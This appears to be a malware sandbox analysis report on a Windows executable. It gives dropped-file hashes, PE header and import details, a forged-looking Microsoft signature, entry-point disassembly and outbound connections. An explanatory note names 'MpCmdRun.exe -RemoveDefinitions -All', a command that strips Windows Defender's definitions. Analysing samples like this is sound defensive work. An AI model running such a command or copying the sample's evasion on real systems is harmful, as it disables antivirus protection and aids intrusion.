SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
(The record above appears eight times in the report with identical size, hashes and preview. Windows PowerShell writes this probe file, __PSScriptPolicyTest_<random>.ps1, into the user's temp directory every time it starts in order to test AppLocker policy; it is a side effect of the powershell.exe launches rather than a payload, and the number of copies tracks the number of PowerShell starts during the run.)
Process:C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):97
Entropy (8bit):4.331807756485642
Encrypted:false
SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:195D02DA13D597A52F848A9B28D871F6
SHA1:D048766A802C61655B9689E953103236EACCB1C7
SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:false
Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
(The dots in the preview stand for the CR/LF bytes of MpCmdRun's console output. A service and engine version of 0.0.0.0 together with "No engine/signature is currently loaded" is the state MpCmdRun.exe -RemoveDefinitions -All leaves behind: the file is harmless in itself, but its content records that Windows Defender had no definitions loaded at this point of the run.)
                                                                                                                                                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Entropy (8bit):7.991974525763679
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                      File name:9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File size:7'186'035 bytes
                                                                                                                                                                                                                                      MD5:03bb5937fb7b74837da488b2278d0811
                                                                                                                                                                                                                                      SHA1:51259fa1bf7608d3c394c2f7776f581d5251aa01
                                                                                                                                                                                                                                      SHA256:fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29
                                                                                                                                                                                                                                      SHA512:8f9a20db244661771745d353ae3669c8fa7be60ab3a68e4075de0500513b591b30ecf44e340fddcf92a09814fa4e796329dc6a49f4b309f0979c8fe73ed2e097
                                                                                                                                                                                                                                      SSDEEP:196608:OQV1vLB6ylnlPzf+JiJCsmFMvQn6hqgdhY:TLBRlnlPSa7mmvQpgdhY
                                                                                                                                                                                                                                      TLSH:E97633A5637409F6F9BAE33CC916D952B771F13943B0DA970390822A2F236D15E7BB01
                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..
                                                                                                                                                                                                                                      Icon Hash:17213117aa131369
                                                                                                                                                                                                                                      Entrypoint:0x14000ce20
                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                      Time Stamp:0x6778B497 [Sat Jan 4 04:09:59 2025 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                      Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                                      Signature Valid:false
                                                                                                                                                                                                                                      Signature Issuer:CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                      Error Number:-2146869232
                                                                                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                                                                                      • 16/11/2023 20:20:09 14/11/2024 20:20:09
                                                                                                                                                                                                                                      Subject Chain
                                                                                                                                                                                                                                      • CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                                      Version:3
                                                                                                                                                                                                                                      Thumbprint MD5:9B7554FFA2D97FE692CB10D7B2E315A7
                                                                                                                                                                                                                                      Thumbprint SHA-1:D8FB0CC66A08061B42D46D03546F0D42CBC49B7C
                                                                                                                                                                                                                                      Thumbprint SHA-256:2D7FFCE2C256016291B67285456AA8DA779D711BBF8E6B85C212A157DDFBE77E
                                                                                                                                                                                                                                      Serial:3300000460CF42A912315F6FB3000000000460
Instruction
dec eax
sub esp, 28h
call 00007F9B98E2EFFCh
dec eax
add esp, 28h
jmp 00007F9B98E2EC1Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F9B98E2F3C8h
test eax, eax
je 00007F9B98E2EDC3h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F9B98E2EDA7h
dec eax
cmp ecx, eax
je 00007F9B98E2EDB6h
xor eax, eax
dec eax
cmpxchg dword ptr [0003570Ch], ecx
jne 00007F9B98E2ED90h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F9B98E2ED99h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F9B98E2EDA9h
mov byte ptr [000356F5h], 00000001h
call 00007F9B98E2E4F5h
call 00007F9B98E2F7E0h
test al, al
jne 00007F9B98E2EDA6h
xor al, al
jmp 00007F9B98E2EDB6h
call 00007F9B98E3C2FFh
test al, al
jne 00007F9B98E2EDABh
xor ecx, ecx
call 00007F9B98E2F7F0h
jmp 00007F9B98E2ED8Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000356BCh], 00000000h
mov ebx, ecx
jne 00007F9B98E2EE09h
cmp ecx, 01h
jnbe 00007F9B98E2EE0Ch
call 00007F9B98E2F33Eh
test eax, eax
je 00007F9B98E2EDCAh
test ebx, ebx
jne 00007F9B98E2EDC6h
                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                      lea ecx, dword ptr [000356A6h]
                                                                                                                                                                                                                                      call 00007F9B98E3C0F2h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3ca34 | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0x239c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x44000 | 0x2238 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x6d8103 | 0x2570 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4a000 | 0x764 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3a080 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x39f40 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b000 | 0x4a0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x29f70 | 0x2a000 | b8c3814c5fb0b18492ad4ec2ffe0830a | False | 0.5518740699404762 | data | 6.489205819736506 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0x12a28 | 0x12c00 | 992bf2e70a36080901843ccdb74df699 | False | 0.5243229166666666 | data | 5.750783562792207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x53f8 | 0xe00 | dba0caeecab624a0ccc0d577241601d1 | False | 0.134765625 | data | 1.8392217063172436 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x44000 | 0x2238 | 0x2400 | 9cd1eac931545f28ab09329f8bfce843 | False | 0.4697265625 | data | 5.2645170849678795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x47000 | 0x239c | 0x2400 | d43da4c906ba0cc2fc5a4cbc40329f68 | False | 0.7578125 | data | 7.339187853433314 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x4a000 | 0x764 | 0x800 | 816c68eeb419ee2c08656c31c06a0fff | False | 0.5576171875 | data | 5.2809528666624175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x47220 | 0x11b | PNG image data, 16 x 15, 8-bit colormap, non-interlaced | | | 1.03886925795053
RT_ICON | 0x4733c | 0x16e | PNG image data, 24 x 23, 8-bit colormap, non-interlaced | | | 1.030054644808743
RT_ICON | 0x474ac | 0x1d9 | PNG image data, 32 x 30, 8-bit colormap, non-interlaced | | | 1.0232558139534884
RT_ICON | 0x47688 | 0x2e1 | PNG image data, 48 x 45, 8-bit colormap, non-interlaced | | | 1.0149253731343284
RT_ICON | 0x4796c | 0x451 | PNG image data, 64 x 60, 8-bit colormap, non-interlaced | | | 1.0099547511312217
RT_ICON | 0x47dc0 | 0xce1 | PNG image data, 128 x 120, 8-bit colormap, non-interlaced | | | 1.0033363663936912
RT_GROUP_ICON | 0x48aa4 | 0x5a | data | | | 0.7777777777777778
RT_VERSION | 0x48b00 | 0x38c | PGP symmetric key encrypted data - Plaintext or unencrypted data | | | 0.45704845814977973
RT_MANIFEST | 0x48e8c | 0x50d | XML 1.0 document, ASCII text | | | 0.4694508894044857
DLL | Import
USER32.dll | CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll |
KERNEL32.dll | GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 4, 2025 09:42:34.171122074 CET | 49816 | 80 | 192.168.2.5 | 208.95.112.1
Jan 4, 2025 09:42:34.175950050 CET | 80 | 49816 | 208.95.112.1 | 192.168.2.5
Jan 4, 2025 09:42:34.176048040 CET | 49816 | 80 | 192.168.2.5 | 208.95.112.1
Jan 4, 2025 09:42:34.176166058 CET | 49816 | 80 | 192.168.2.5 | 208.95.112.1
Jan 4, 2025 09:42:34.180941105 CET | 80 | 49816 | 208.95.112.1 | 192.168.2.5
Jan 4, 2025 09:42:34.758825064 CET | 80 | 49816 | 208.95.112.1 | 192.168.2.5
Jan 4, 2025 09:42:34.799671888 CET | 49816 | 80 | 192.168.2.5 | 208.95.112.1
Jan 4, 2025 09:42:35.015697002 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
